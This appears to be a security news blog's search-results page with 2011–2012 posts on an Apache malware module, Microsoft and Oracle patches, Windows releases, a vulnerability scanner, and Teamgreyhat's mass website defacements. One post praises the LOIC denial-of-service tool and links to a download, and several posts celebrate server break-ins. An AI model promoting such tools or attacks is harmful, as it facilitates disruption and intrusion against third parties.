Showing posts sorted by relevance for query web server. Sort by date Show all posts
Showing posts sorted by relevance for query web server. Sort by date Show all posts

Apache Web Server Under Stealth Attack

Posted by Avik Sarkar On 5/05/2011 10:43:00 am

 
Online attackers seem to love to exploit Web servers, because they can add scripts that quickly and automatically add malicious links to static HTML pages via an iFrame tag, or code that attempts to exploit website visitors' PCs via drive-by downloads. But an attack discovered on Friday, dubbed Apmod, pushes this attack technique one step further by not just infecting static Web pages. "The attack was unusual in that the Web server itself was the infection target," said Cathal Mullaney, a security response engineer at Symantec, in a blog post. "When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code--only those specific pages put a user at risk of infection."
This new attack, which has been seen in the wild but doesn't currently appear to be widespread, targets the popular Apache Web Server, which runs on Windows and Linux. According to Netcraft, Apache Web Server is now used to host about 204 million websites.
The attack is innovative in that it uses Apache's built-in filter capabilities. A filter, as defined by Apache, "is a process that is applied to data that is sent or received by the server," and can be used to add functionality without rewriting the code base. Many websites use this capability to add advertisements to Web pages on the fly, while also tracking that advertising delivery to generate revenue via ad agencies.
"We have discovered a malicious module that performs identical steps in order to include links to malicious websites," said Mullaney. "All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache's code base; the module uses Apache's inherent functionality to infect users and attempts to redirect them to a malicious Web page."
Interestingly, the module doesn't attempt to infect every Web page it serves. In fact, it includes a number of anti-detection capabilities, including watching for signs of administrator access or processes and avoids serving malware to search engines. Furthermore, when it does serve a Web page infected with links to malicious websites, the module then temporarily blacklists the user's IP address to avoid delivering multiple, infected Web pages, which might make its activities easier to detect. It then queries a command and control server to provide a new iFrame tag, further hampering detection.
As a result, "this is a complex and potentially difficult threat to detect accurately," said Mullaney. "As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Mochahost Web Server Rooted, More Than 1250 Sites Hacked By Teamgreyhat

Posted by Avik Sarkar On 12/23/2011 12:15:00 am


Few days earlier well known hackers group Teamgreyhat has rooted the Guyana Server and thus they hacked more than 1500 websites. Now TGH strikes again, this time another big attack happens. Mochahost Web hosting company's server compromised and more than 1250 websites get hacked by TGH hackers. After this attack TGH authority claimed them selves as the "Achilles of Cyber World". To emphasizes this statement they changed the background music of the hacked page and used the famous quotes of well-known movie Troy. If you dig the history you will find that TGH has already made their own identity on the web by hacking many web servers such as Theexpert ServerMalaysian Web-hostCybertek Web-Server5gbfree.comGuyana Server and many more. Again this attack proves the strength of TGH. All the hacked sites can be found on a pastebin written by Teamgreyhat. 

Press Release of TGH:- 
"Guyana Server Rooted, 1500 Websites Hacked By Teamgreyhat
T-Series Official Website Hacked By Teamgreyhat (TGH)
Theexpert Server Rooted By TGH
Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat
Cybertek Web-Server Rooted By TGH 
& & & Many more..............
Yet moooooooooooore to Come.................


The Common question arise and that is who is TGH and what we are capable of???
Here is the Answer


We are TGH 
We are Warriors 
We are Achilles of Cyber World
............
"Remember, I will still be here
As long as you hold me, in your memory


Remember, when your dreams have ended
Time can be transcended 
Just remember me


I am the one star that keeps burning, so brightly,
It is the last light, to fade into the rising sun


I'm with you
Whenever you tell, my story
For I am all I've done


Remember, I will still be here
As long as you hold me, in your memory
Remember me


I am that one voice in the cold wind, that whispers
And if you listen, you'll hear me call across the sky


As long as I still can reach out, and touch you
Then I will never die


Remember, I'll never leave you
If you will only
Remember me


Remember me...


Remember, I will still be here
As long as you hold me
In your memory


Remember, when your dreams have ended
Time can be transcended
I live forever 
Remember me


Remember me
Remember... me..."




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Windows 8 Consumer Preview & Windows Server 8 Beta By Microsoft (Freely Downloadable)

Posted by Avik Sarkar On 3/03/2012 01:43:00 am

Microsoft Released Windows 8 Consumer Preview & Windows Server 8 Beta (Freely Downloadable)
A double boom for Windows lovers. Software giant Microsoft has officially released the Consumer Preview Windows 8 & Windows Server 8 Beta.
Windows 8 Consumer Preview :-
The Windows 8 Consumer Preview offers a more robust experience for testing the world's most popular operating system and is available to the widest range of people yet following the initial release of the Windows 8 Developer Preview late last year. The Developer Preview received more than 3 million downloads.
"With Windows 8, we reimagined the different ways people interact with their PC and how to make everything feel like a natural extension of the device, whether using a Windows 8 tablet, laptop or all-in-one," said Steven Sinofsky, president of the Windows and Windows Live Division at Microsoft. "The Windows 8 Consumer Preview brings a no-compromises approach to using your PC."
The test "beta" version of the revamped system was introduced at the Mobile World Congress in Barcelona, the planet's largest cell phone trade show, and borrows some of the look of Microsoft's Windows Phone 7 software for Windows 8. Windows 8 doesn't have the traditional "Start" menu, and applications are spread across a mosaic of tiles in a design Microsoft calls "Metro" -- seen as an attempt by the company as a scramble to preserve its market share. And executives said it powers up on PCs in eight seconds, much faster than the previous version.
What is New In Windows 8 Consumer Preview :-
  • Broad range of product changes and improvements. Since the Developer Preview in September, designed to preview the programming platform, Windows 8 has progressed across every dimension. From completing the user experience for touch, keyboard and mouse to refining the development platform, the Consumer Preview improves performance, quality and reliability across all subsystems.
  • With the added features, it represents a more complete view of the capabilities of Windows 8. Windows Store with new apps. The Windows 8 Consumer Preview marks the beta opening of the Windows Store, which is filled with a variety of new Metro style apps from both third-party developers and Microsoft. During the Consumer Preview, these apps are available to try and experience at no cost to users. The Windows Store will offer personalised recommendations, and Windows 8 gives users the ability to take their apps and settings with them across multiple PCs, making it easy to discover and try new apps while offering developers the greatest opportunity of any platform.
  • Connecting to the cloud across Windows-based PCs and Windows Phone 7. The Windows 8 Consumer Preview offers seamless integration with the content people care about across their Web services. An optional additional sign-on with a Microsoft account provides access to a host of features, including the ability to roam all settings, use cloud storage, communicate with email, calendar and contacts, and connect to a broad range of services. Your connection to the cloud works across your Windows-based PCs and your Windows 7 phones.
  • Internet Explorer 10 Platform Preview 5. The best way to experience the Web on Windows is with Internet Explorer 10. The browser has been re-imagined to create a new experience designed specifically for Windows 8 devices. It provides an edge-to-edge user interface that is all about less browser and more Web. Fast and fluid, Internet Explorer is hardware-accelerated to enable Web performance.
  • Preview of new hardware capabilities. At the event, Microsoft also showcased Windows 8 running on a wide range of new x86- and ARM-based reference hardware. This hardware will be available to select developers for trial and testing as previously announced.
Additional details can be found on the official website of Microsoft Windows. Also Microsoft makes Windows 8 Consumer Preview is made available for free Download

Windows Server 8 Beta :- 
The beta of Windows Server 8 is now available for IT professionals and software developers around the world to download. In the Windows Server official Blog Bill Laing, Corporate Vice President of Microsoft Corporation Said - In September we introduced Windows Server “8” with a preview to help developers and hardware partners prepare new and existing applications, systems and devices. The response from that community, along with hundreds of customers in our early adopters program, has been incredibly positive. A common theme of feedback has been how broad and deep the new capabilities are. Now is the time for you, IT professionals in organizations of all sizes, to get your hands on this new release, discover the new capabilities and contribute to the development of what we call the cloud-optimized OS.
I’ll highlight in this post just a few examples of new capabilities that you’ll want to explore. With the new Hyper-V we are taking virtualization above and beyond to provide a multi-tenant platform for cloud computing. For example, with Hyper-V Network Virtualization you can create virtual networks so different business units, or even multiple customers, can seamlessly share network infrastructure.  You will be able to move virtual machines and servers around without losing their network assignments. In Windows Server “8” we are delivering high availability and disaster recovery through software technology on much more cost effective hardware. For example, with File Server Transparent Failover you can now more easily perform hardware or software maintenance of nodes in a File Server cluster by moving file shares between nodes with little interruption to server applications that are storing data on those file shares. We’re also delivering a tremendous amount of new capabilities for multi-machine management and automation. You will want to explore the dramatic new improvements to Server Manager, as well as the new Windows PowerShell. With 2,300 commandlets provided out of the box, Windows PowerShell allows you to automate everything you can do manually with the user interface. And, with technologies like Intellisense, we’ve made it very easy for you to master all of that power. Additionally, Windows Server “8” provides a powerful server application platform that enables you to develop and host the most demanding of application workloads. For example, with .NET Framework 4.5 you can take advantage of new asynch language and library support to build server and web applications that scale far beyond what other platforms provide. Our new IIS 8 web server provides better security isolation and resource sand-boxing between applications, native support for web sockets, and the ability to host significantly more sites on a server.

For Additional Information & To Download Windows Server 8 Beta Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Patches Serious 34 Vulnerabilities

Posted by Avik Sarkar On 6/15/2011 10:00:00 pm



In today's Patch Tuesday, Microsoft released 16 bulletins addressing 34 vulnerabilities in Microsoft Windows, Microsoft Office, Internet Explorer, .NET, SQL, Visual Studio, Silverlight, VML and ISA. Nine of the bulletins are rated Critical, with seven rated as Important. Wolfgang Kandek, Qualys CTO, comments: "The only bulletin with a known expoit in the wild is MS11-046, a local privilege escalation flaw in the "afd.sys" driver. IT admins can check with their end-point security providers for coverage, but should include this bulletin high on their to-do lists in any case, as it is only a matter of time until we see more attackers use malware taking advantage of this exploit to gain control of your workstations."

Here are the bulletins:-

Vulnerability in OLE Automation 
This security update resolves a privately reported vulnerability in Microsoft Windows Object Linking and Embedding (OLE) Automation. The vulnerability could allow remote code execution if a user visits a Web site containing a specially crafted Windows Metafile (WMF) image. In all cases, however, an attacker would have no way to force users to visit such a Web site. Instead, an attacker would have to convince users to visit a malicious Web site, typically by getting them to click a link in an e-mail message or Instant Messenger request.

Vulnerability in .NET Framework and Microsoft Silverlight
This security update resolves a privately reported vulnerability in Microsoft .NET Framework and Microsoft Silverlight. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs) or Silverlight applications. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario. This vulnerability could also be used by Windows .NET applications to bypass Code Access Security (CAS) restrictions.

Vulnerability in Threat Management Gateway Firewall Client 
This security update resolves a privately reported vulnerability in the Microsoft Forefront Threat Management Gateway (TMG) 2010 Client, formerly named the Microsoft Forefront Threat Management Gateway Firewall Client. The vulnerability could allow remote code execution if an attacker leveraged a client computer to make specific requests on a system where the TMG firewall client is used.

Vulnerability in Windows Kernel-Mode Drivers
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user visits a network share (or visits a web site that points to a network share) containing a specially crafted OpenType font (OTF). In all cases, however, an attacker would have no way to force a user to visit such a web site or network share. Instead, an attacker would have to convince a user to visit the web site or network share, typically by getting them to click a link in an e-mail message or Instant Messenger message.

Vulnerabilities in Distributed File System
This security update resolves two privately reported vulnerabilities in the Microsoft Distributed File System (DFS). The more severe of these vulnerabilities could allow remote code execution when an attacker sends a specially crafted DFS response to a client-initiated DFS request. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.

Vulnerability in SMB Client
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request. To exploit the vulnerability, an attacker must convince the user to initiate an SMB connection to a specially crafted SMB server.

Vulnerability in .NET Framework
This security update resolves a publicly disclosed vulnerability in Microsoft .NET Framework. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs). Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario. This vulnerability could also be used by Windows .NET applications to bypass Code Access Security (CAS) restrictions.

Cumulative Security Update for Internet Explorer
This security update resolves eleven privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Vulnerability in Vector Markup Language
This security update resolves a privately reported vulnerability in the Microsoft implementation of Vector Markup Language (VML). This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Moderate for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers. Internet Explorer 9 is not affected by the vulnerability.

The vulnerability could allow remote code execution if a user viewed a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Vulnerability in MHTML
This security update resolves a publicly disclosed vulnerability in the MHTML protocol handler in Microsoft Windows. The vulnerability could allow information disclosure if a user opens a specially crafted URL from an attacker's Web site. An attacker would have to convince the user to visit the Web site, typically by getting them to follow a link in an e-mail message or Instant Messenger message.

Vulnerabilities in Microsoft Excel
This security update resolves eight privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Installing and configuring Office File Validation (OFV) to prevent the opening of suspicious files blocks the attack vectors for exploiting the vulnerabilities described in CVE-2011-1272, CVE-2011-1273, and CVE-2011-1279. Microsoft Excel 2010 is only affected by CVE-2011-1273 described in this bulletin. The automated Microsoft Fix it solution, "Disable Edit in Protected View for Excel 2010," available in Microsoft Knowledge Base Article 2501584, blocks the attack vectors for exploiting CVE-2011-1273.

Vulnerability in Ancillary Function Driver
This security update resolves a publicly disclosed vulnerability in the Microsoft Windows Ancillary Function Driver (AFD). The vulnerability could allow elevation of privilege if an attacker logs on to a user's system and runs a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability.

Vulnerability in Hyper-V Could
This security update resolves a privately reported vulnerability in Windows Server 2008 Hyper-V and Windows Server 2008 R2 Hyper-V. The vulnerability could allow denial of service if a specially crafted packet is sent to the VMBus by an authenticated user in one of the guest virtual machines hosted by the Hyper-V server. An attacker must have valid logon credentials and be able to send specially crafted content from a guest virtual machine to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Vulnerability in SMB Server
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow denial of service if an attacker created a specially crafted SMB packet and sent the packet to an affected system. Firewall best practices and standard default firewall configurations can help protect networks from attacks originating outside the enterprise perimeter that would attempt to exploit this vulnerability.

Vulnerability in the Microsoft XML Editor
This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.

Vulnerability in Active Directory Certificate Services Web Enrollment
This security update resolves a privately reported vulnerability in Active Directory Certificate Services Web Enrollment. The vulnerability is a cross-site scripting (XSS) vulnerability that could allow elevation of privilege, enabling an attacker to execute arbitrary commands on the site in the context of the target user. An attacker who successfully exploited this vulnerability would need to send a specially crafted link and convince a user to click the link. In all cases, however, an attacker would have no way to force a user to visit the Web site. Instead, an attacker would have to persuade a user to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes the user to the vulnerable Web site.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Acunetix Web Vulnerability Scanner 8 BETA Arrived

Posted by Avik Sarkar On 11/19/2011 05:58:00 pm

One of the worlds famous web vulnerability scanner Acunetix has released their next version WVS 8 BETA. Many of you have been biting their nails in anticipation of this Beta, so sit tight and read on for the next most important stage in the evolution of Acunetix WVS.  Version 8 of Web Vulnerability Scanner has been optimized to make life easier at every stage of a security scan. WVS is easier to use for web admins and security analysts alike: enhanced automation, ability to save scan settings as a template to avoid reconfiguration, and multiple instance support for simultaneous scans of several websites. WVS 8 also ushers in a new exciting co-operation between Acunetix and Imperva: developers of the industry’s leading Web Application Firewall.

Some Improved Features:-    
  • AcuSensor Technology
  • An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
  • Industries' most advanced and in-depth SQL injection and Cross site scripting testing
  • Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer  
  • Visual macro recorder makes testing web forms and password protected areas easy
  • Support for pages with CAPTHCA, single sign-on and Two Factor authentication mechanisms
  • Extensive reporting facilities including VISA PCI compliance reports
  • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
  • Intelligent crawler detects web server type and application language
  • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
  • Port scans a web server and runs security checks against network services running on the server  
Brief Description of  Acunetix 8 Features:-

Manipulation of inputs from URLs:-
Acunetix WVS can automatically detect URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.

Automatic IIS 7  rewrite rule interpretation:-
Using the web application’s web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.
Support for custom HTTP headers

To function correctly, some web applications need incoming requests to contain specific HTTP headers. It is now possible to define custom HTTP headers to be used during automated scans.

Imperva Web Application Firewall integration:-
An exciting co-operation between Imperva and Acunetix: WVS 8 scan results can be automatically imported into an Imperva Web Application Firewall and interpreted as rules.

New vulnerability class: HTTP Parameter Pollution:-
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.
Multiple instance support:-
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites and opening up further support for multi-user scenarios on the same server/workstation.
Redesigned Scheduler:-
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance and thereby allowing scans to complete in less time.
Automatic custom 404 error page recognition and detection
Acunetix WVS 8 can automatically determine if a custom error page is in use and recognizes it without requiring any custom 404 recognition patterns to be configured for a scan

Scan settings templates:-
WVS 8 now allow the settings for the scan of a specific application to be saved as individual templates, making it quick and easy to recall the exact settings for a website each time it is scanned. This is particularly useful when scanning multiple sites, allowing the user to load the template for each site instead of re-configuring all the settings manually.

Simplified Scan Wizard:-
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far less options so it’s much easier and quicker to kick off a scan.
Smart memory management

The following settings have been added to ensure even the most complex scans will complete automatically, and successfully:-
  •     Define number of files per directory
  •     Limit number of subdirectories per website
  •     Assign Crawler memory limit

Real-time Crawler status:-
Crawler data is now updated in real-time information and provides live feedback how many files have been crawled, how many inputs have been detected, and more.

Scan termination status included in report:-
Reports now include the termination or completion status of each vulnerability scan. For example: the report will display if the scan was completed successfully or halted manually.

Web application coverage report:-
A new report template that lists all the web application files crawled and specific vulnerability tests performed on each file.
Log file retention:-
It is now possible to define the retention span before log files are automatically flushed; to ensure logs are not deleted each time WVS is restarted.


To Download Acunetix Web Vulnerability Scanner 8 BETA Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Colombiaweb Server Rooted More Than 2K Websites Hacked By Teamgreyhat (TGH)

Posted by Avik Sarkar On 1/08/2012 05:31:00 pm


Well known hacker group Teamgreyhat strikes again. In this attack they have rooted the colombiaweb's web server and thus they hacked into more than 2000 websites. TGH released a pastebin notes where they have mentioned all the hacked sites and their message. If you dig the decent past you will find out that TGH has already made their unique reputation on the web. This black-hat group is specially expert is rooting servers. Earlier they have rooted Mochahost Web Server, Guyana ServerTheexpert ServerMalaysian Web-hostCybertek Web-Server5gbfree.com and many more. Also one of their big blow was that they have hacked the Hotmail mail servers. Again this 2000 sites hacking proves the capabilities of TGH. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LOIC :Dos Attacking tool

Posted by Avik Sarkar On 5/10/2011 01:30:00 am




LOIC basically turns your computer’s network connection into a firehose of garbage requests, directed towards a target web server. On its own, one computer rarely generates enough TCP, UDP, or HTTP requests at once to overwhelm a web server—garbage requests can easily ignored while legit requests for web pages are responded to as normal. But when thousands of users run LOIC at once, the wave of requests become overwhelming, often shutting a web server (or one of its connected machines, like a database server) down completely, or preventing legitimate requests from being answered.
LOIC is more focued on web applications we can also call it applicaton based DOS attack. LOIC can be used on a target site by flooding the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.
LOIC is a nice tool to perform dos or ddos attack but try it on your own risk. It does no have an ability to hide your IP address.  Source code is also available .
Download LOIC 1.0.4 here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

12 Thousand Websites Hacked By Teamgreyhat (TGH)

Posted by Avik Sarkar On 1/27/2012 02:09:00 am

12 Thousand Websites Hacked By Teamgreyhat (TGH) For #Free Education & #Health in India
Hacktivist Teamgreyhat strikes again. This time it was really a big one. In this blow they have blown more than 12 Thousand websites. In dead this is the biggest attack ever done by TGH guys. According to TGH authority "this attack is just the trailer........ wait and stay tuned for the entire episode...."  Also in their press release TGH has declared that their next target will be two high profile websites of India and they are Central Drug Research Institute (CDRI) & Bhabha Atomic Research Centre (BARC). Through this massive attack the hacker group also spreed their message and that is:-
#free education from the beginning to masters....or even more.
#free health (proper treatment)
The official press release and all the hacked sites can be found on a tinypaste post. The deface mirror can be found on zone-hack. Among those hacked sites there thousand of high profile sites such as Govt bodies, Business Organization, Educational Site, Commercial sector, IT industry sites and many more. TGH authority also claimed that the list of all those hacked sites covers many countries cyber fence such as India, UK, US, Bangladesh and so on. And to make this possible they have hacked more than 5 web servers. Few days ago TGH has rooted a Govt Server and in that attack they have hacked more than 5K sites also if you dig the history you will find that earlier this group has hacked many web-servers such as Ankit Fadia's Server, Colombiaweb, Mochahost Web Server, Guyana Server, Malaysian Web-hostCybertek Web-Server5gbfree.com, Theexpert Server  and so on. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LG Australia Hacked By Intra Web Security Exploit Team

Posted by Avik Sarkar On 10/24/2011 03:44:00 pm


The official website of LG Australia has been hacked and defaced by Intra Web Security Exploit Team.

Hacked Site:-
www.lge.com.au
Mirror Link:-
http://www.zone-h.org/mirror/id/15669350
 

The site gone off-line in the mid after noon (Sydney Time) late LG recovered it and now it has been redirecting to www.lg.com/au/
Ty Miller, CTO with security firm Pure Hacking, said the attacker had compromised the web server hosting LG's site. This is usually more serious than another common website defacement method called an SQL Injection, which allows websites to be defaced via exploiting a hole in a web application without the hackers accessing the web server itself. "It looks like the attacker has compromised the web server itself as the website home page has been replaced completely," said Miller.
"Usually if the web application itself was compromised via Stored Cross Site Scripting or SQL Injection then you would still see the original home page HTML code containing the malicious code."
LG said it was alerted to the hack on Friday morning and immediately suspended the site "until the incident is fully investigated". It said the attack only affected lge.com.au, not lg.com.au, which had replaced the former as the "local primary hosting solution" a number of years ago.


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

CDRI- Central Drug Research Institute Hacked By Teamgreyhat

Posted by Avik Sarkar On 1/30/2012 09:39:00 pm

CDRI- Central Drug Research Institute Hacked By Teamgreyhat, Database Exposed
Hacktivist Teamgreyhat continues their operation. Just few days ago they have hacked more than 12K websites world wide, TGH authority claimed that their aim is "#Free Education & #Health in India". In the last press release TGH also vows that thy will hit CDRI (Central Drug Research Institute) and today they exactly did that. They have hacked the databse of CDRI and exposed all the scientist details including full name, Designation, Group, Phone No, Email id and so on. The hacked Db and the press release can be found on a pastebin release by the hacker group.Earlier this group has hacked many high profile sites and servers such as Trinidad Govt Server, Ankit Fadia's Server, Colombiaweb, Mochahost Web-Server, Guyana Server, Malaysian Web-hostCybertek Web-Server5gbfree.com, Theexpert Server  and so on. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat

Posted by Avik Sarkar On 9/22/2011 04:50:00 am

Malaysian web hosting company Jomhosting.net web-server compromised and more than 150 sites hacked and defaced by Teamgreyhat (TGH). 1st TGH hacked into the web server and defaced all the websites on that server. Later according to the TGH official's:-
"honestly saying there ware tooo many sites to deface.....so we are just bloody tired...also our mass defacer script was not working so we (R00t3r, 3rr0R, Skywalk3r & Zero) dumped the entire server. Hope the admin will forgive our silly mistake... :P lolzzzz..."

Official Website of Jomhosting:-
http://jomhosting.net/

Mirror Link:-
http://www.arab-zone.org/mirror/15992/jomhosting.net/

To see the rest of other hacked sites click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update

Posted by Avik Sarkar On 4/28/2011 10:18:00 pm


Oracle is all set for the upcoming critical patch update. The pre-release announcement by the company indicates that in all 73 vulnerabilities associated with numerous products will be mitigated during the next critical patch update. The update will mitigate security vulnerabilities associated with Oracle database server, fusion middleware, enterprise manager, e-business suite, supply chain products, PeopleSoft, JD Edwards suite, Siebel CRM, industry applications, Sun products and Open office suite.

The company releases quarterly critical patch updates on Tuesday closest to 17th day of January, April, July and October. The company uses Common Vulnerability Scoring System (CVSS) version 2.0 to rate vulnerabilities. The vulnerabilities are assigned scores based on the prerequisites for exploiting the vulnerability, ease of exploit, and impact of the attack on availability, confidentiality and integrity. Base scores range from 0.0 to 10.0 with ten being the most severe vulnerability.

Vulnerabilities may be caused by technological flaws, programming errors, and other human errors. Developers are required constantly upgrade their technical skills through online IT degree courses, training programs and refresher courses to deal with ever evolving threats.

The critical patch update will address six vulnerabilities in database server. The vulnerabilities affect components such as application service level management, database vault, Oracle help, security service, warehouse builder, UIX and network foundation. Two of the six vulnerabilities do not require authentication for exploitation of vulnerabilities. Highest base score for security flaws affecting database server is 6.5. The update will mitigate 9 flaws associated with fusion middleware, 6 of which are exploitable without authentication.

The vulnerabilities affect Oracle help, HTTP server, JRockit, outside In technology, security service, WebLogic server, portal and single sign on. Oracle has assigned highest severity score of 10 for vulnerabilities affecting fusion middleware. 4 vulnerabilities will be fixed in Oracle applications, 2 of which are exploitable without authentication. The vulnerabilities have been assigned a base score of 4.3 and affect application object library, applications install, and web ADI. The update will resolve a flaw in Supply chain products suite, which is exploitable without authentication. Highest base score for vulnerability in supply chain products suite is 4.3 and affects Agile technology program.

14 security flaws have related to PeopleSoft Suite will be fixed in the upcoming critical patch, 1 of which is exploitable without authentication. Highest base score for security flaws associated with PeopleSoft suite is 4.3 and affects PeopleSoft Enterprise, Enterprise CRM, ELS, HRMS and People tools. The critical patch update will resolve 8 issues associated with JD Edwards suite, 7 of which are exploitable without authentication. Highest base score for vulnerabilities in JD Edwards suite is 6.4 and affects EnterpriseOne tools.

The update will address a vulnerability associated with industry applications, which affects InForm. Highest base score for vulnerability in industry applications is 5.5. 8 security flaws will be mitigated in Sun products suite, seven of which are exploitable without authentication. Oracle has assigned highest severity score of 10 for security flaws affecting Sun products suite. The components affected include Java Dynamic Management Kit, Java system web server, Solaris, OpenSSO Enterprise, GlassFish Enterprise server, java system application server, java system access manager policy agent, and java system messaging server.

The upcoming critical patch update will fix 8 security issues related to Open Office suite, of which 7 are exploitable without authentication. Highest base score for security flaws in Open Office suite is 9.3. Open Office, StarOffice and StarSuite are affected by the vulnerabilities.

Vulnerabilities are identified by professionals qualified in IT degree programs and security certifications such as penetration testing. Developers encourage both in-house and independent security researchers to detect and report security flaws so that they can be mitigated before exploitation by attackers.

Online IT courses, e-tutorials, security blogs and alerts from computer emergency response teams could help users in gaining insights on security threats, their implications and importance of security updates. Users must keep track of the security releases and install necessary updates to safeguard their systems and data from unauthorized access. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Releases Windows Server 2012 [Download Now]

Posted by Avik Sarkar On 9/06/2012 04:32:00 pm

Microsoft Releases Windows Server 2012 With Complete Virtualization, Cloud Services, Improved Scalability & Performance [Download Now]

In March this year software giant Microsoft has announced the availability of Windows Server 8, later in April it has been renamed to Windows Server 2012. Windows Server powers many of the worlds' largest datacenters, enables small businesses around the world, and delivers value to organizations of all sizes in between. Windows Server 2012 redefines the server category, delivering hundreds of new features and enhancements spanning virtualization, networking, storage, user experience, cloud computing, automation, and more. Simply put, Windows Server 2012 helps you transform your IT operations to reduce costs and deliver a whole new level of business value. With Windows Server 2012, Microsoft delivers a server platform built on our experience of building and operating many of the world's largest cloud-based services and datacenter. Whether you are setting-up a single server for your small business or architecting a major new datacenter environment, Windows Server 2012 will help you cloud-optimize your IT so you can fully meet your organization's unique needs. 

Features at a Glance:- 

Beyond Virtualization:- Offers a dynamic, multitenant infrastructure to help you scale and secure workloads and build a private cloud. Windows Server 2012 can help you provide:

  • Complete Virtualization Platform- A fully-isolated, multitenant environment with tools that can help guarantee service level agreements, enable usage-based chargeback, and support self-service delivery.
  • Improved Scalability and Performance- A high-density, scalable environment that you can modify to perform at an optimum level based on your needs.
  • Connecting to Cloud Services- A common identity and management framework to enable highly secure and reliable cross-premises connectivity.

The Power of Many Servers, the Simplicity of One:- Delivers a highly available and easy to manage cloud-optimized platform. Windows Server 2012 can help you provide:

  • Flexible Storage- Diverse storage choices that can help you achieve high performance, availability, and storage resource efficiency through virtualization and storage conservation.
  • Continuous Availability- New and improved features that provide cost-effective, highly available services with protection against a wide range of failure scenarios.
  • Management Efficiency- Automation of a broad set of management tasks and simplified deployment of workloads as you move toward full, lights-out automation.

Every App, Any Cloud:- Offers a cloud-optimized server platform that gives you the flexibility to build and deploy applications and websites on-premises, in the cloud, or across both. Windows Server 2012 can help you deliver:

  • Flexibility to Build On-Premises and in the Cloud- A consistent set of tools and frameworks that enables developers to build symmetrical or hybrid applications across the datacenter and the cloud.
  • A Scalable and Elastic Infrastructure- New features to help you increase website density and efficiency, plus frameworks, services, and tools to increase the scalability and elasticity of modern applications.
